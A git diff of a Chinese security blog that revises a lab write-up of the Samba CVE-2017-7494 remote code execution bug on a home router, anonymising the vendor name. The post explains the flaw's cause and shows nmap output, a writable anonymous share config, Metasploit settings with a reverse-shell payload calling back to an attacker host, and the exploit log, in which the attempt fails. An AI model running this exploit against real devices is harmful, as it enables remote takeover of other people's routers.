Site updated: 2019-07-27 14:41:41

This commit is contained in:
Cool-Y 2019-07-27 14:42:04 +08:00
parent 50ac5928c3
commit b13450713e
100 changed files with 171 additions and 166 deletions


@ -641,7 +641,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -829,7 +829,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -731,7 +731,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -731,7 +731,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -736,7 +736,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -859,7 +859,7 @@ Server -------wire----------|
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -708,7 +708,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -717,7 +717,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -528,8 +528,8 @@
<div class="post-nav-prev post-nav-item"> <div class="post-nav-prev post-nav-item">
<a href="/2019/03/25/Samba-CVE/" rel="prev" title="小米路由器与Samba漏洞CVE-2017-7494"> <a href="/2019/03/25/Samba-CVE/" rel="prev" title="某厂商路由器与Samba漏洞CVE-2017-7494">
小米路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-right"></i> 某厂商路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-right"></i>
</a> </a>
</div> </div>
@ -725,7 +725,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -79,13 +79,13 @@
<meta name="description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Lin"> <meta name="description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件">
<meta name="keywords" content="Samba,远程执行,CVE"> <meta name="keywords" content="Samba,远程执行,CVE">
<meta property="og:type" content="article"> <meta property="og:type" content="article">
<meta property="og:title" content="小米路由器与Samba漏洞CVE-2017-7494"> <meta property="og:title" content="某厂商路由器与Samba漏洞CVE-2017-7494">
<meta property="og:url" content="https://cool-y.github.io/2019/03/25/Samba-CVE/index.html"> <meta property="og:url" content="https://cool-y.github.io/2019/03/25/Samba-CVE/index.html">
<meta property="og:site_name" content="混元霹雳手"> <meta property="og:site_name" content="混元霹雳手">
<meta property="og:description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Lin"> <meta property="og:description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件">
<meta property="og:locale" content="zh-Hans"> <meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg">
@ -100,10 +100,10 @@
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png">
<meta property="og:updated_time" content="2019-04-15T07:35:38.080Z"> <meta property="og:updated_time" content="2019-07-27T06:39:41.484Z">
<meta name="twitter:card" content="summary"> <meta name="twitter:card" content="summary">
<meta name="twitter:title" content="小米路由器与Samba漏洞CVE-2017-7494"> <meta name="twitter:title" content="某厂商路由器与Samba漏洞CVE-2017-7494">
<meta name="twitter:description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Lin"> <meta name="twitter:description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件">
<meta name="twitter:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png"> <meta name="twitter:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png">
@ -140,7 +140,7 @@
<title>小米路由器与Samba漏洞CVE-2017-7494 | 混元霹雳手</title> <title>某厂商路由器与Samba漏洞CVE-2017-7494 | 混元霹雳手</title>
@ -336,7 +336,7 @@
<h1 class="post-title" itemprop="name headline">小米路由器与Samba漏洞CVE-2017-7494</h1> <h1 class="post-title" itemprop="name headline">某厂商路由器与Samba漏洞CVE-2017-7494</h1>
<div class="post-meta"> <div class="post-meta">
@ -388,7 +388,7 @@
<span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="小米路由器与Samba漏洞CVE-2017-7494"> <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="某厂商路由器与Samba漏洞CVE-2017-7494">
<span class="post-meta-divider">|</span> <span class="post-meta-divider">|</span>
<span class="post-meta-item-icon"> <span class="post-meta-item-icon">
<i class="fa fa-eye"></i> <i class="fa fa-eye"></i>
@ -411,7 +411,7 @@
</span> </span>
<span title="字数统计"> <span title="字数统计">
1.6k 字 1.7k 字
</span> </span>
@ -425,7 +425,7 @@
</span> </span>
<span title="阅读时长"> <span title="阅读时长">
6 分钟 7 分钟
</span> </span>
</div> </div>
@ -446,7 +446,7 @@
<h1 id="小米路由器与Samba漏洞CVE-2017-7494"><a href="#小米路由器与Samba漏洞CVE-2017-7494" class="headerlink" title="小米路由器与Samba漏洞CVE-2017-7494"></a>小米路由器与Samba漏洞CVE-2017-7494</h1><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。<br>具体执行条件如下:</p> <h1 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h1><p>Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。<br>具体执行条件如下:</p>
<ol> <ol>
<li><p>服务器打开了文件/打印机共享端口445让其能够在公网上访问</p> <li><p>服务器打开了文件/打印机共享端口445让其能够在公网上访问</p>
</li> </li>
@ -455,31 +455,34 @@
<li><p>恶意攻击者需猜解Samba服务端共享目录的物理路径</p> <li><p>恶意攻击者需猜解Samba服务端共享目录的物理路径</p>
</li> </li>
</ol> </ol>
<h2 id="Samba介绍"><a href="#Samba介绍" class="headerlink" title="Samba介绍"></a>Samba介绍</h2><p>Samba是在Linux和Unix系统上实现SMB协议的一个免费软件由服务器及客户端程序构成。SMBServer Messages Block信息服务块是一种在局域网上共享文件和打印机的一种通信协议它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。</p> <h1 id="Samba介绍"><a href="#Samba介绍" class="headerlink" title="Samba介绍"></a>Samba介绍</h1><p>Samba是在Linux和Unix系统上实现SMB协议的一个免费软件由服务器及客户端程序构成。SMBServer Messages Block信息服务块是一种在局域网上共享文件和打印机的一种通信协议它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。</p>
<p>SMB协议是客户机/服务器型协议客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源还能与全世界的电脑分享资源。</p> <p>SMB协议是客户机/服务器型协议客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源还能与全世界的电脑分享资源。</p>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>处于\source3\rpc_server\src_pipe.c的is_known_pipename()函数未对传进来的管道名pipename的路径分隔符/进行识别过滤导致可以用绝对路径调用恶意的so文件从而远程任意代码执行。<br>首先看到is_known_pipename()函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png" alt></p> <p>某厂商路由器的smbd版本为4.0.21该漏洞影响Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。</p>
<p>跟进到smb_probe_module()<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg" alt></p> <h1 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h1><p>处于<code>\source3\rpc_server\src_pipe.c的is_known_pipename()</code>函数未对传进来的管道名<code>pipename</code>的路径分隔符<code>/</code>进行识别过滤导致可以用绝对路径调用恶意的so文件从而远程任意代码执行。<br>首先看到<code>is_known_pipename()`</code>函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png" alt></p>
<p>再跟进到do_smb_load_module(),发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-01-19.jpg" alt></p> <p>跟进到<code>smb_probe_module()</code><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg" alt></p>
<p>我们可以通过smb服务上传一个恶意的so文件该文件包含一个输出函数init_samba_module随后通过上述过程进行调用执行任意代码。</p> <p>再跟进到<code>do_smb_load_module()</code>,发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-01-19.jpg" alt></p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><h3 id="小米路由器"><a href="#小米路由器" class="headerlink" title="小米路由器"></a>小米路由器</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">netstat -apnt</span><br><span class="line">tcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbd</span><br><span class="line"></span><br><span class="line">nmap 192.168.31.1</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">445/tcp open microsoft-ds</span><br></pre></td></tr></table></figure> <p>我们可以通过smb服务上传一个恶意的so文件随后通过上述过程进行调用执行任意代码。</p>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><h2 id="某路由器满足条件"><a href="#某路由器满足条件" class="headerlink" title="某路由器满足条件"></a>某路由器满足条件</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">netstat -apnt</span><br><span class="line">tcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbd</span><br><span class="line"></span><br><span class="line">nmap 192.168.31.1</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">445/tcp open microsoft-ds</span><br></pre></td></tr></table></figure>
<p><strong><em>端口已开启</em></strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/samba/smb.conf</span><br><span class="line"> deadtime = 30</span><br><span class="line"> domain master = yes</span><br><span class="line"> encrypt passwords = true</span><br><span class="line"> enable core files = no</span><br><span class="line"> guest account = nobody</span><br><span class="line"> guest ok = yes</span><br><span class="line"> invalid users 
=</span><br><span class="line"> local master = yes</span><br><span class="line"> load printers = no</span><br><span class="line"> map to guest = Bad User</span><br><span class="line"> min receivefile size = 16384</span><br><span class="line"> null passwords = yes</span><br><span class="line"> obey pam restrictions = yes</span><br><span class="line"> passdb backend = smbpasswd</span><br><span class="line"> preferred master = yes</span><br><span class="line"> printable = no</span><br><span class="line"> smb encrypt = disabled</span><br><span class="line"> smb passwd file = /etc/samba/smbpasswd</span><br><span class="line"> socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576</span><br><span class="line"> smb2 max trans = 1048576</span><br><span class="line"> smb2 max write = 1048576</span><br><span class="line"> smb2 max read = 1048576</span><br><span class="line"> write cache size = 262144</span><br><span class="line"> syslog = 2</span><br><span class="line"> syslog only = yes</span><br><span class="line"> use sendfile = yes</span><br><span class="line"> writeable = yes</span><br><span class="line"> log level = 1</span><br><span class="line"> unicode = True</span><br><span class="line"> max log size = 500</span><br><span class="line"> log file = /tmp/log/samba.log</span><br><span class="line"> server role = STANDALONE</span><br><span class="line"></span><br><span class="line">[homes]</span><br><span class="line"> comment = Home Directories</span><br><span class="line"> browsable = no</span><br><span class="line"> read only = no</span><br><span class="line"> create mode = 0750</span><br><span class="line"></span><br><span class="line">[data] ***SMB_SHARE_NAME***</span><br><span class="line"> path = /tmp ***SMB_FOLDER***</span><br><span class="line"> read only = no ***具备可写权限***</span><br><span class="line"> guest ok = yes ***允许匿名***</span><br><span class="line"> create mask = 0777</span><br><span class="line"> directory mask = 
0777</span><br></pre></td></tr></table></figure></p> <p><strong><em>端口已开启</em></strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/samba/smb.conf</span><br><span class="line"> deadtime = 30</span><br><span class="line"> domain master = yes</span><br><span class="line"> encrypt passwords = true</span><br><span class="line"> enable core files = no</span><br><span class="line"> guest account = nobody</span><br><span class="line"> guest ok = 
yes</span><br><span class="line"> invalid users =</span><br><span class="line"> local master = yes</span><br><span class="line"> load printers = no</span><br><span class="line"> map to guest = Bad User</span><br><span class="line"> min receivefile size = 16384</span><br><span class="line"> null passwords = yes</span><br><span class="line"> obey pam restrictions = yes</span><br><span class="line"> passdb backend = smbpasswd</span><br><span class="line"> preferred master = yes</span><br><span class="line"> printable = no</span><br><span class="line"> smb encrypt = disabled</span><br><span class="line"> smb passwd file = /etc/samba/smbpasswd</span><br><span class="line"> socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576</span><br><span class="line"> smb2 max trans = 1048576</span><br><span class="line"> smb2 max write = 1048576</span><br><span class="line"> smb2 max read = 1048576</span><br><span class="line"> write cache size = 262144</span><br><span class="line"> syslog = 2</span><br><span class="line"> syslog only = yes</span><br><span class="line"> use sendfile = yes</span><br><span class="line"> writeable = yes</span><br><span class="line"> log level = 1</span><br><span class="line"> unicode = True</span><br><span class="line"> max log size = 500</span><br><span class="line"> log file = /tmp/log/samba.log</span><br><span class="line"> server role = STANDALONE</span><br><span class="line"></span><br><span class="line">[homes]</span><br><span class="line"> comment = Home Directories</span><br><span class="line"> browsable = no</span><br><span class="line"> read only = no</span><br><span class="line"> create mode = 0750</span><br><span class="line"></span><br><span class="line">[data] ***SMB_SHARE_NAME***</span><br><span class="line"> path = /tmp ***SMB_FOLDER***</span><br><span class="line"> read only = no ***具备可写权限***</span><br><span class="line"> guest ok = yes ***允许匿名***</span><br><span class="line"> create mask = 0777</span><br><span class="line"> 
directory mask = 0777</span><br></pre></td></tr></table></figure></p>
<p><strong><em>具有可写权限、目录为/tmp</em></strong></p> <p><strong><em>具有可写权限、目录为/tmp</em></strong></p>
<h2 id="攻击使用metasploit"><a href="#攻击使用metasploit" class="headerlink" title="攻击使用metasploit"></a>攻击使用metasploit</h2><h3 id="设置攻击参数"><a href="#设置攻击参数" class="headerlink" title="设置攻击参数"></a>设置攻击参数</h3><p>靶机是小米路由器R3它的系统为mips架构但是这个库好像对它的支持不是很好<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/linux/samba/is_known_pipename):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> RHOSTS 192.168.31.1 yes The target address range or CIDR identifier</span><br><span class="line"> RPORT 445 yes The SMB service port (TCP)</span><br><span class="line"> SMB_FOLDER no The directory to use within the writeable SMB share</span><br><span class="line"> SMB_SHARE_NAME no The name of the SMB share containing a writeable directory</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (generic/shell_reverse_tcp):</span><br><span 
class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> LHOST 192.168.216.129 yes The listen address (an interface may be specified)</span><br><span class="line"> LPORT 4444 yes The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line"> Id Name</span><br><span class="line"> -- ----</span><br><span class="line"> 7 Linux MIPSLE</span><br></pre></td></tr></table></figure></p> <h2 id="攻击使用metasploit"><a href="#攻击使用metasploit" class="headerlink" title="攻击使用metasploit"></a>攻击使用metasploit</h2><h3 id="设置攻击参数"><a href="#设置攻击参数" class="headerlink" title="设置攻击参数"></a>设置攻击参数</h3><p>靶机是某厂商路由器它的系统为mips架构但是这个库好像对它的支持不是很好<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/linux/samba/is_known_pipename):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required 
Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> RHOSTS 192.168.31.1 yes The target address range or CIDR identifier</span><br><span class="line"> RPORT 445 yes The SMB service port (TCP)</span><br><span class="line"> SMB_FOLDER no The directory to use within the writeable SMB share</span><br><span class="line"> SMB_SHARE_NAME no The name of the SMB share containing a writeable directory</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (generic/shell_reverse_tcp):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> LHOST 192.168.216.129 yes The listen address (an interface may be specified)</span><br><span class="line"> LPORT 4444 yes The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line"> Id Name</span><br><span class="line"> -- ----</span><br><span class="line"> 7 Linux MIPSLE</span><br></pre></td></tr></table></figure></p>
<h3 id="执行攻击"><a href="#执行攻击" class="headerlink" title="执行攻击"></a>执行攻击</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.216.129:4444</span><br><span class="line">[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path</span><br><span class="line">[*] 192.168.31.1:445 - Retrieving the remote path of the share &apos;data&apos;</span><br><span class="line">[*] 192.168.31.1:445 - Share &apos;data&apos; has server-side path &apos;/tmp</span><br><span class="line">[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br></pre></td></tr></table></figure> <h3 id="执行攻击"><a href="#执行攻击" class="headerlink" title="执行攻击"></a>执行攻击</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.216.129:4444</span><br><span class="line">[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path</span><br><span class="line">[*] 192.168.31.1:445 - Retrieving the remote path of the share &apos;data&apos;</span><br><span class="line">[*] 192.168.31.1:445 - Share &apos;data&apos; has server-side path &apos;/tmp</span><br><span class="line">[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] Exploit completed, but no 